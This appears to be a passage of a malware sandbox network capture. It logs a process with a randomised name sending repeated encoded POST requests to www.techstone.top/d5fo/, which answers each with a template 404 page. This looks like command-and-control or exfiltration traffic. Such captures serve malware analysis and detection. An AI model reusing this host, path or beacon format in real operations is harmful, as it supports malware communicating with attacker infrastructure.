Jul 25, 2024 12:08:29.356503963 CEST	735	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.techstone.top Origin: http://www.techstone.top Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.techstone.top/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 76 5a 36 56 31 4e 61 72 34 56 4d 43 73 7a 44 4c 53 34 31 68 35 6e 4d 6e 5a 69 6a 6f 4c 59 43 45 66 6b 6e 67 54 67 6a 74 56 6d 34 6d 58 38 52 55 6f 4b 65 32 7a 4b 76 53 43 36 63 44 46 72 7a 2f 34 37 64 2f 51 32 6d 43 72 53 6c 50 4c 54 37 75 58 75 77 65 65 30 46 56 55 42 36 70 34 33 5a 54 50 65 55 67 72 62 31 52 47 65 52 6b 56 34 72 72 56 44 50 39 63 36 30 65 63 6c 68 71 6d 33 38 4a 2f 44 75 76 53 75 72 77 4a 39 43 57 74 36 5a 52 70 56 75 33 44 38 6a 36 48 4a 43 4e 57 6b 59 32 4c 42 2b 68 2b 4b 4b 63 55 34 58 2f 61 68 6b 55 79 64 6f 43 79 51 42 33 6e 6d 56 35 35 46 6c 66 37 31 6c 42 2b 6f 3d Data Ascii: 7b7D=UvZ6V1Nar4VMCszDLS41h5nMnZijoLYCEfkngTgjtVm4mX8RUoKe2zKvSC6cDFrz/47d/Q2mCrSlPLT7uXuwee0FVUB6p43ZTPeUgrb1RGeRkV4rrVDP9c60eclhqm38J/DuvSurwJ9CWt6ZRpVu3D8j6HJCNWkY2LB+h+KKcU4X/ahkUydoCyQB3nmV55Flf71lB+o=
Jul 25, 2024 12:08:29.978710890 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:08:29 GMT Server: Apache Content-Length: 32106 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Jul 25, 2024 12:08:29.979003906 CEST	1236	IN	Data Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
Jul 25, 2024 12:08:29.979010105 CEST	1236	IN	Data Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
Jul 25, 2024 12:08:29.979017019 CEST	1236	IN	Data Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
Jul 25, 2024 12:08:29.979698896 CEST	1236	IN	Data Raw: 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62 6c 65 73 20 54 65 6d 70 6c 61 74 65 22 20 63 Data Ascii: ndex.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-con
Jul 25, 2024 12:08:29.979705095 CEST	1236	IN	Data Raw: 32 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 32 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 Data Ascii: 2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li> <li><a class="dropdown-item" href="home4.html">Home 4</a></li>
Jul 25, 2024 12:08:29.979712009 CEST	1236	IN	Data Raw: 22 68 65 61 64 65 72 31 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 31 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: "header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.html">Header 1 Light</a></li>
Jul 25, 2024 12:08:29.979717970 CEST	108	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </li> <li><a c
Jul 25, 2024 12:08:29.979723930 CEST	1236	IN	Data Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
Jul 25, 2024 12:08:29.979729891 CEST	1236	IN	Data Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
Jul 25, 2024 12:08:29.984424114 CEST	1236	IN	Data Raw: 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d Data Ascii: nu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a> <ul class="dropdown-menu">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49728	67.223.117.189	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:31.891442060 CEST	755	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.techstone.top Origin: http://www.techstone.top Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.techstone.top/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 76 5a 36 56 31 4e 61 72 34 56 4d 44 49 33 44 4e 31 73 31 70 35 6e 54 69 5a 69 6a 69 72 59 47 45 66 6f 6e 67 53 55 4a 74 6d 43 34 6d 79 59 52 56 70 4b 65 78 7a 4b 76 5a 69 36 64 4e 6c 72 30 2f 34 2b 69 2f 53 79 6d 43 72 32 6c 50 50 58 37 75 67 36 78 65 4f 30 48 5a 30 42 34 74 34 33 5a 54 50 65 55 67 72 65 6f 52 48 36 52 6a 6c 6f 72 71 77 76 4d 2b 63 36 33 58 38 6c 68 75 6d 33 67 4a 2f 44 4d 76 54 7a 45 77 4c 31 43 57 76 69 5a 51 38 68 78 73 7a 38 70 30 6e 49 56 42 48 46 71 35 38 68 67 67 76 50 32 4e 79 38 6c 2b 73 4d 4f 4f 51 56 41 52 53 38 35 6e 30 75 69 6f 4a 6b 4d 46 59 6c 56 66 70 39 62 62 61 68 57 58 50 65 48 4b 48 4b 35 2b 6c 48 6c 58 66 7a 43 Data Ascii: 7b7D=UvZ6V1Nar4VMDI3DN1s1p5nTiZijirYGEfongSUJtmC4myYRVpKexzKvZi6dNlr0/4+i/SymCr2lPPX7ug6xeO0HZ0B4t43ZTPeUgreoRH6RjlorqwvM+c63X8lhum3gJ/DMvTzEwL1CWviZQ8hxsz8p0nIVBHFq58hggvP2Ny8l+sMOOQVARS85n0uioJkMFYlVfp9bbahWXPeHKHK5+lHlXfzC
Jul 25, 2024 12:08:32.485968113 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:08:32 GMT Server: Apache Content-Length: 32106 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Jul 25, 2024 12:08:32.485980988 CEST	1236	IN	Data Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
Jul 25, 2024 12:08:32.485991001 CEST	1236	IN	Data Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
Jul 25, 2024 12:08:32.486217976 CEST	1236	IN	Data Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
Jul 25, 2024 12:08:32.486227036 CEST	896	IN	Data Raw: 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62 6c 65 73 20 54 65 6d 70 6c 61 74 65 22 20 63 Data Ascii: ndex.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-con
Jul 25, 2024 12:08:32.486243010 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
Jul 25, 2024 12:08:32.486252069 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
Jul 25, 2024 12:08:32.486258984 CEST	448	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
Jul 25, 2024 12:08:32.486697912 CEST	1236	IN	Data Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
Jul 25, 2024 12:08:32.486705065 CEST	224	IN	Data Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
Jul 25, 2024 12:08:32.491271973 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 5</a> <ul class="dropdown-menu"> <li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49729	67.223.117.189	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:34.448179007 CEST	1772	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.techstone.top Origin: http://www.techstone.top Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.techstone.top/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 76 5a 36 56 31 4e 61 72 34 56 4d 44 49 33 44 4e 31 73 31 70 35 6e 54 69 5a 69 6a 69 72 59 47 45 66 6f 6e 67 53 55 4a 74 6d 4b 34 6d 6b 45 52 55 4c 69 65 77 7a 4b 76 55 43 36 59 4e 6c 71 78 2f 38 53 75 2f 53 75 32 43 70 65 6c 64 63 50 37 6f 52 36 78 55 4f 30 48 58 6b 42 37 70 34 32 45 54 50 75 51 67 72 4f 6f 52 48 36 52 6a 6d 41 72 2b 56 44 4d 78 38 36 30 65 63 6c 58 71 6d 33 45 4a 38 79 78 76 54 6d 37 78 2f 42 43 57 50 79 5a 63 71 39 78 78 44 38 6e 35 48 49 64 42 48 4a 78 35 39 4a 73 67 76 72 49 4e 31 49 6c 2b 61 56 77 66 6b 5a 66 56 51 51 35 7a 33 53 43 71 4d 67 62 48 4f 6c 39 64 70 5a 36 51 4a 4a 6b 61 61 61 4b 50 32 32 39 6c 43 62 44 66 71 32 63 2b 34 42 7a 2b 77 7a 49 32 61 59 6c 6f 51 78 61 77 6f 57 43 72 5a 73 42 56 73 39 4b 79 73 4e 35 36 2b 44 59 36 68 4f 4a 39 69 55 7a 4a 69 75 33 44 76 61 39 78 47 30 78 6b 78 4d 70 52 63 4d 4d 54 76 51 6e 77 4c 32 58 61 6f 62 64 49 31 57 4e 75 69 79 4d 35 39 69 67 67 4d 2f 75 55 59 63 36 75 6f 2b 32 62 6d 38 78 73 33 75 2b 54 77 43 4f 2f [TRUNCATED] Data Ascii: 7b7D=UvZ6V1Nar4VMDI3DN1s1p5nTiZijirYGEfongSUJtmK4mkERULiewzKvUC6YNlqx/8Su/Su2CpeldcP7oR6xUO0HXkB7p42ETPuQgrOoRH6RjmAr+VDMx860eclXqm3EJ8yxvTm7x/BCWPyZcq9xxD8n5HIdBHJx59JsgvrIN1Il+aVwfkZfVQQ5z3SCqMgbHOl9dpZ6QJJkaaaKP229lCbDfq2c+4Bz+wzI2aYloQxawoWCrZsBVs9KysN56+DY6hOJ9iUzJiu3Dva9xG0xkxMpRcMMTvQnwL2XaobdI1WNuiyM59iggM/uUYc6uo+2bm8xs3u+TwCO/++FoslYTCMgoqyJW3vqypuqsL5RJLNtawKL91Dr2Mj9b/nOMuxW46geAEYqTXoV2rwo8Td0PoR+dSGE2k4juS3b3evaaR1XrIw8nuUDKr6zd/cY6pphAT3+WV1bMQfPib4Y6U8iPVS0DjzuP/a+XJra9+lWW4IYa102VUDMQOCCQ06ZtgzfZIECvgNSP5sFk6DrsRexn8kJx047J/yMPfJCGKNw1+KTxQpW/aAx5LajB+0HqEroSOJOYk6JuBmbCJdBKFVXZjCnXAr+LcyCsEfy8LOF0M9dGVO05OpA/dJfB9Pt6NKen02MxZlzRZhFvLv5fbmpcgsCTLkwWgtk4kGSScjahBvydWB6jPl+JcVRZ9REmmJzM9pOQlmZPA2eWDDOlzIjSZBWwXhrVn0vSQpgIeBKWh9+0MC8HAaXRnyp0DZN+K2vLK3cVZwI0TkRKcaCR7FacMt9WCeUs5ycP89KnlEeKe/CTQ+OGKq7BxWXLRa7zTCSpbn1hynqvMmYvGbY5cr8tDSRbqZ/2dVEobwzZfEAJZnsZVck3FvdnQBissKBTF8+9wU9ZGiXl4ICRlSo8z/PL0Aj/S6Rch79USb0tAvAxaqzPwMazD72cWfJo7Q7e7LCTcpBlKwV+jdzwZqrasIXonflyn/SkrqFHKNUnfvCmLaT0zD [TRUNCATED]
Jul 25, 2024 12:08:35.120264053 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:08:34 GMT Server: Apache Content-Length: 32106 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Jul 25, 2024 12:08:35.120280027 CEST	1236	IN	Data Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
Jul 25, 2024 12:08:35.120291948 CEST	1236	IN	Data Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
